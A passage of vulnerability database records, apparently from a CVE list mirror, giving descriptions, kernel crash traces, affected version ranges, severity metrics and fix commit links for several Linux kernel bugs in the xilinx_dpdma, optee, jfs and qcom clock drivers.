"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndma: xilinx_dpdma: Fix locking\n\nThere are several places where either chan-\u003elock or chan-\u003evchan.lock was\nnot held. Add appropriate locking. This fixes lockdep warnings like\n\n[ 31.077578] ------------[ cut here ]------------\n[ 31.077831] WARNING: CPU: 2 PID: 40 at drivers/dma/xilinx/xilinx_dpdma.c:834 xilinx_dpdma_chan_queue_transfer+0x274/0x5e0\n[ 31.077953] Modules linked in:\n[ 31.078019] CPU: 2 PID: 40 Comm: kworker/u12:1 Not tainted 6.6.20+ #98\n[ 31.078102] Hardware name: xlnx,zynqmp (DT)\n[ 31.078169] Workqueue: events_unbound deferred_probe_work_func\n[ 31.078272] pstate: 600000c5 (nZCv daIF -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n[ 31.078377] pc : xilinx_dpdma_chan_queue_transfer+0x274/0x5e0\n[ 31.078473] lr : xilinx_dpdma_chan_queue_transfer+0x270/0x5e0\n[ 31.078550] sp : ffffffc083bb2e10\n[ 31.078590] x29: ffffffc083bb2e10 x28: 0000000000000000 x27: ffffff880165a168\n[ 31.078754] x26: ffffff880164e920 x25: ffffff880164eab8 x24: ffffff880164d480\n[ 31.078920] x23: ffffff880165a148 x22: ffffff880164e988 x21: 0000000000000000\n[ 31.079132] x20: ffffffc082aa3000 x19: ffffff880164e880 x18: 0000000000000000\n[ 31.079295] x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000\n[ 31.079453] x14: 0000000000000000 x13: ffffff8802263dc0 x12: 0000000000000001\n[ 31.079613] x11: 0001ffc083bb2e34 x10: 0001ff880164e98f x9 : 0001ffc082aa3def\n[ 31.079824] x8 : 0001ffc082aa3dec x7 : 0000000000000000 x6 : 0000000000000516\n[ 31.079982] x5 : ffffffc7f8d43000 x4 : ffffff88003c9c40 x3 : ffffffffffffffff\n[ 31.080147] x2 : ffffffc7f8d43000 x1 : 00000000000000c0 x0 : 0000000000000000\n[ 31.080307] Call trace:\n[ 31.080340] xilinx_dpdma_chan_queue_transfer+0x274/0x5e0\n[ 31.080518] xilinx_dpdma_issue_pending+0x11c/0x120\n[ 31.080595] zynqmp_disp_layer_update+0x180/0x3ac\n[ 31.080712] zynqmp_dpsub_plane_atomic_update+0x11c/0x21c\n[ 31.080825] drm_atomic_helper_commit_planes+0x20c/0x684\n[ 31.080951] drm_atomic_helper_commit_tail+0x5c/0xb0\n[ 31.081139] commit_tail+0x234/0x294\n[ 31.081246] drm_atomic_helper_commit+0x1f8/0x210\n[ 31.081363] drm_atomic_commit+0x100/0x140\n[ 31.081477] drm_client_modeset_commit_atomic+0x318/0x384\n[ 31.081634] drm_client_modeset_commit_locked+0x8c/0x24c\n[ 31.081725] drm_client_modeset_commit+0x34/0x5c\n[ 31.081812] __drm_fb_helper_restore_fbdev_mode_unlocked+0x104/0x168\n[ 31.081899] drm_fb_helper_set_par+0x50/0x70\n[ 31.081971] fbcon_init+0x538/0xc48\n[ 31.082047] visual_init+0x16c/0x23c\n[ 31.082207] do_bind_con_driver.isra.0+0x2d0/0x634\n[ 31.082320] do_take_over_console+0x24c/0x33c\n[ 31.082429] do_fbcon_takeover+0xbc/0x1b0\n[ 31.082503] fbcon_fb_registered+0x2d0/0x34c\n[ 31.082663] register_framebuffer+0x27c/0x38c\n[ 31.082767] __drm_fb_helper_initial_config_and_unlock+0x5c0/0x91c\n[ 31.082939] drm_fb_helper_initial_config+0x50/0x74\n[ 31.083012] drm_fbdev_dma_client_hotplug+0xb8/0x108\n[ 31.083115] drm_client_register+0xa0/0xf4\n[ 31.083195] drm_fbdev_dma_setup+0xb0/0x1cc\n[ 31.083293] zynqmp_dpsub_drm_init+0x45c/0x4e0\n[ 31.083431] zynqmp_dpsub_probe+0x444/0x5e0\n[ 31.083616] platform_probe+0x8c/0x13c\n[ 31.083713] really_probe+0x258/0x59c\n[ 31.083793] __driver_probe_device+0xc4/0x224\n[ 31.083878] driver_probe_device+0x70/0x1c0\n[ 31.083961] __device_attach_driver+0x108/0x1e0\n[ 31.084052] bus_for_each_drv+0x9c/0x100\n[ 31.084125] __device_attach+0x100/0x298\n[ 31.084207] device_initial_probe+0x14/0x20\n[ 31.084292] bus_probe_device+0xd8/0xdc\n[ 31.084368] deferred_probe_work_func+0x11c/0x180\n[ 31.084451] process_one_work+0x3ac/0x988\n[ 31.084643] worker_thread+0x398/0x694\n[ 31.084752] kthread+0x1bc/0x1c0\n[ 31.084848] ret_from_fork+0x10/0x20\n[ 31.084932] irq event stamp: 64549\n[ 31.084970] hardirqs last enabled at (64548): [\u003cffffffc081adf35c\u003e] _raw_spin_unlock_irqrestore+0x80/0x90\n[ 31.085157]\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:10:02.814Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/fcdd5bb4a8c81c64c1334d7e0aba41a8829a24de"
},
{
"url": "https://git.kernel.org/stable/c/0ccac964520a6f19e355652c8ca38af2a7f27076"
},
{
"url": "https://git.kernel.org/stable/c/8bf574183282d219cfa991f7df37aad491d74c11"
},
{
"url": "https://git.kernel.org/stable/c/8e3c94767cad5150198e4337c8b91f3bb068e14b"
},
{
"url": "https://git.kernel.org/stable/c/c660be571609e03e7d5972343536a736fcb31557"
},
{
"url": "https://git.kernel.org/stable/c/244296cc3a155199a8b080d19e645d7d49081a38"
}
],
"title": "dma: xilinx_dpdma: Fix locking",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35990",
"datePublished": "2024-05-20T09:47:55.736Z",
"dateReserved": "2024-05-17T13:50:33.146Z",
"dateUpdated": "2025-05-04T09:10:02.814Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35785 (GCVE-0-2024-35785)
Vulnerability from cvelistv5
Published
2024-05-17 12:24
Modified
2025-05-04 09:05
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tee: optee: Fix kernel panic caused by incorrect error handling
The error path while failing to register devices on the TEE bus has a
bug leading to kernel panic as follows:
[ 15.398930] Unable to handle kernel paging request at virtual address ffff07ed00626d7c
[ 15.406913] Mem abort info:
[ 15.409722] ESR = 0x0000000096000005
[ 15.413490] EC = 0x25: DABT (current EL), IL = 32 bits
[ 15.418814] SET = 0, FnV = 0
[ 15.421878] EA = 0, S1PTW = 0
[ 15.425031] FSC = 0x05: level 1 translation fault
[ 15.429922] Data abort info:
[ 15.432813] ISV = 0, ISS = 0x00000005, ISS2 = 0x00000000
[ 15.438310] CM = 0, WnR = 0, TnD = 0, TagAccess = 0
[ 15.443372] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0
[ 15.448697] swapper pgtable: 4k pages, 48-bit VAs, pgdp=00000000d9e3e000
[ 15.455413] [ffff07ed00626d7c] pgd=1800000bffdf9003, p4d=1800000bffdf9003, pud=0000000000000000
[ 15.464146] Internal error: Oops: 0000000096000005 [#1] PREEMPT SMP
Commit 7269cba53d90 ("tee: optee: Fix supplicant based device enumeration")
lead to the introduction of this bug. So fix it appropriately.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: a953e45ebeae9a5ce342c012f7eb2a92cc8af89b Version: 01c13d8a95e0909f0081d6e3e8a891761992371b Version: 1c9561b438cbe61e78515fc7b16dc7fb8cf0b763 Version: d3c4786b01aad8c377718f92d6d9b15906ee0a2a Version: 7269cba53d906cf257c139d3b3a53ad272176bca Version: 7269cba53d906cf257c139d3b3a53ad272176bca |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:47.405Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bc40ded92af55760d12bec8222d4108de725dbe4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4b12ff5edd141926d49c9ace4791adf3a4902fe7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e5b5948c769aa1ebf962dddfb972f87d8f166f95"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/520f79c110ff712b391b3d87fcacf03c74bc56ee"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bfa344afbe472a9be08f78551fa2190c1a07d7d3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/95915ba4b987cf2b222b0f251280228a1ff977ac"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35785",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:42:54.358717Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:23.278Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/tee/optee/device.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "bc40ded92af55760d12bec8222d4108de725dbe4",
"status": "affected",
"version": "a953e45ebeae9a5ce342c012f7eb2a92cc8af89b",
"versionType": "git"
},
{
"lessThan": "4b12ff5edd141926d49c9ace4791adf3a4902fe7",
"status": "affected",
"version": "01c13d8a95e0909f0081d6e3e8a891761992371b",
"versionType": "git"
},
{
"lessThan": "e5b5948c769aa1ebf962dddfb972f87d8f166f95",
"status": "affected",
"version": "1c9561b438cbe61e78515fc7b16dc7fb8cf0b763",
"versionType": "git"
},
{
"lessThan": "520f79c110ff712b391b3d87fcacf03c74bc56ee",
"status": "affected",
"version": "d3c4786b01aad8c377718f92d6d9b15906ee0a2a",
"versionType": "git"
},
{
"lessThan": "bfa344afbe472a9be08f78551fa2190c1a07d7d3",
"status": "affected",
"version": "7269cba53d906cf257c139d3b3a53ad272176bca",
"versionType": "git"
},
{
"lessThan": "95915ba4b987cf2b222b0f251280228a1ff977ac",
"status": "affected",
"version": "7269cba53d906cf257c139d3b3a53ad272176bca",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/tee/optee/device.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.7"
},
{
"lessThan": "6.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.10.204",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.15.143",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "6.1.68",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "6.6.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "6.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "6.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntee: optee: Fix kernel panic caused by incorrect error handling\n\nThe error path while failing to register devices on the TEE bus has a\nbug leading to kernel panic as follows:\n\n[ 15.398930] Unable to handle kernel paging request at virtual address ffff07ed00626d7c\n[ 15.406913] Mem abort info:\n[ 15.409722] ESR = 0x0000000096000005\n[ 15.413490] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 15.418814] SET = 0, FnV = 0\n[ 15.421878] EA = 0, S1PTW = 0\n[ 15.425031] FSC = 0x05: level 1 translation fault\n[ 15.429922] Data abort info:\n[ 15.432813] ISV = 0, ISS = 0x00000005, ISS2 = 0x00000000\n[ 15.438310] CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n[ 15.443372] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n[ 15.448697] swapper pgtable: 4k pages, 48-bit VAs, pgdp=00000000d9e3e000\n[ 15.455413] [ffff07ed00626d7c] pgd=1800000bffdf9003, p4d=1800000bffdf9003, pud=0000000000000000\n[ 15.464146] Internal error: Oops: 0000000096000005 [#1] PREEMPT SMP\n\nCommit 7269cba53d90 (\"tee: optee: Fix supplicant based device enumeration\")\nlead to the introduction of this bug. So fix it appropriately."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:05:20.743Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/bc40ded92af55760d12bec8222d4108de725dbe4"
},
{
"url": "https://git.kernel.org/stable/c/4b12ff5edd141926d49c9ace4791adf3a4902fe7"
},
{
"url": "https://git.kernel.org/stable/c/e5b5948c769aa1ebf962dddfb972f87d8f166f95"
},
{
"url": "https://git.kernel.org/stable/c/520f79c110ff712b391b3d87fcacf03c74bc56ee"
},
{
"url": "https://git.kernel.org/stable/c/bfa344afbe472a9be08f78551fa2190c1a07d7d3"
},
{
"url": "https://git.kernel.org/stable/c/95915ba4b987cf2b222b0f251280228a1ff977ac"
}
],
"title": "tee: optee: Fix kernel panic caused by incorrect error handling",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35785",
"datePublished": "2024-05-17T12:24:28.069Z",
"dateReserved": "2024-05-17T12:19:12.338Z",
"dateUpdated": "2025-05-04T09:05:20.743Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52602 (GCVE-0-2023-52602)
Vulnerability from cvelistv5
Published
2024-03-06 06:45
Modified
2025-05-04 07:39
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
jfs: fix slab-out-of-bounds Read in dtSearch
Currently while searching for current page in the sorted entry table
of the page there is a out of bound access. Added a bound check to fix
the error.
Dave:
Set return code to -EIO
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "ce8bc22e9486",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "1b9d6828589d",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "1c40ca3d39d7",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "6c6a96c3d74d",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "cab0c265ba18",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "7110650b85dd",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "bff9d4078a23",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThan": "fa5492ee8946",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThanOrEqual": "4.20",
"status": "unaffected",
"version": "4.19.307",
"versionType": "custom"
},
{
"lessThanOrEqual": "5.5",
"status": "unaffected",
"version": "5.4.269",
"versionType": "custom"
},
{
"lessThanOrEqual": "5.11",
"status": "unaffected",
"version": "5.10.210",
"versionType": "custom"
},
{
"lessThanOrEqual": "5.16",
"status": "unaffected",
"version": "5.15.149",
"versionType": "custom"
},
{
"lessThanOrEqual": "6.2",
"status": "unaffected",
"version": "6.1.77",
"versionType": "custom"
},
{
"lessThanOrEqual": "6.7",
"status": "unaffected",
"version": "6.6.16",
"versionType": "custom"
},
{
"lessThanOrEqual": "6.8",
"status": "unaffected",
"version": "6.7.4",
"versionType": "custom"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-52602",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-23T15:55:18.699623Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-400",
"description": "CWE-400 Uncontrolled Resource Consumption",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-16T15:55:56.866Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.268Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ce8bc22e948634a5c0a3fa58a179177d0e3f3950"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1b9d6828589d57f94a23fb1c46112cda39d7efdb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1c40ca3d39d769931b28295b3145c25f1decf5a6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6c6a96c3d74df185ee344977d46944d6f33bb4dd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cab0c265ba182fd266c2aa3c69d7e40640a7f612"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7110650b85dd2f1cee819acd1345a9013a1a62f7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bff9d4078a232c01e42e9377d005fb2f4d31a472"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fa5492ee89463a7590a1449358002ff7ef63529f"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/jfs/jfs_dtree.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ce8bc22e948634a5c0a3fa58a179177d0e3f3950",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1b9d6828589d57f94a23fb1c46112cda39d7efdb",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1c40ca3d39d769931b28295b3145c25f1decf5a6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6c6a96c3d74df185ee344977d46944d6f33bb4dd",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cab0c265ba182fd266c2aa3c69d7e40640a7f612",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7110650b85dd2f1cee819acd1345a9013a1a62f7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "bff9d4078a232c01e42e9377d005fb2f4d31a472",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "fa5492ee89463a7590a1449358002ff7ef63529f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/jfs/jfs_dtree.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\njfs: fix slab-out-of-bounds Read in dtSearch\n\nCurrently while searching for current page in the sorted entry table\nof the page there is a out of bound access. Added a bound check to fix\nthe error.\n\nDave:\nSet return code to -EIO"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:39:40.569Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ce8bc22e948634a5c0a3fa58a179177d0e3f3950"
},
{
"url": "https://git.kernel.org/stable/c/1b9d6828589d57f94a23fb1c46112cda39d7efdb"
},
{
"url": "https://git.kernel.org/stable/c/1c40ca3d39d769931b28295b3145c25f1decf5a6"
},
{
"url": "https://git.kernel.org/stable/c/6c6a96c3d74df185ee344977d46944d6f33bb4dd"
},
{
"url": "https://git.kernel.org/stable/c/cab0c265ba182fd266c2aa3c69d7e40640a7f612"
},
{
"url": "https://git.kernel.org/stable/c/7110650b85dd2f1cee819acd1345a9013a1a62f7"
},
{
"url": "https://git.kernel.org/stable/c/bff9d4078a232c01e42e9377d005fb2f4d31a472"
},
{
"url": "https://git.kernel.org/stable/c/fa5492ee89463a7590a1449358002ff7ef63529f"
}
],
"title": "jfs: fix slab-out-of-bounds Read in dtSearch",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52602",
"datePublished": "2024-03-06T06:45:29.227Z",
"dateReserved": "2024-03-02T21:55:42.573Z",
"dateUpdated": "2025-05-04T07:39:40.569Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26969 (GCVE-0-2024-26969)
Vulnerability from cvelistv5
Published
2024-05-01 05:19
Modified
2025-05-04 09:01
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
clk: qcom: gcc-ipq8074: fix terminating of frequency table arrays
The frequency table arrays are supposed to be terminated with an
empty element. Add such entry to the end of the arrays where it
is missing in order to avoid possible out-of-bound access when
the table is traversed by functions like qcom_find_freq() or
qcom_find_freq_floor().
Only compile tested.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9607f6224b3966652ce3f4e620c4694df190b64a Version: 9607f6224b3966652ce3f4e620c4694df190b64a Version: 9607f6224b3966652ce3f4e620c4694df190b64a Version: 9607f6224b3966652ce3f4e620c4694df190b64a Version: 9607f6224b3966652ce3f4e620c4694df190b64a Version: 9607f6224b3966652ce3f4e620c4694df190b64a Version: 9607f6224b3966652ce3f4e620c4694df190b64a Version: 9607f6224b3966652ce3f4e620c4694df190b64a Version: 9607f6224b3966652ce3f4e620c4694df190b64a |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.840Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e117c6e2d1617520f5f7d7f6f6b395f01d8b5a27"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/83fe1bbd9e259ad109827ccfbfc2488e0dea8e94"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/851cc19bdb02556fb13629b3e4fef6f2bdb038fe"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9de184d4e557d550fb0b7b833b676bda4f269e4f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dd92b159c506804ac57adf3742d9728298bb1255"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b6b31b4c67ea6bd9222e5b73b330554c57f2f90d"
},
{
"tags": [
"x_transferred"
],
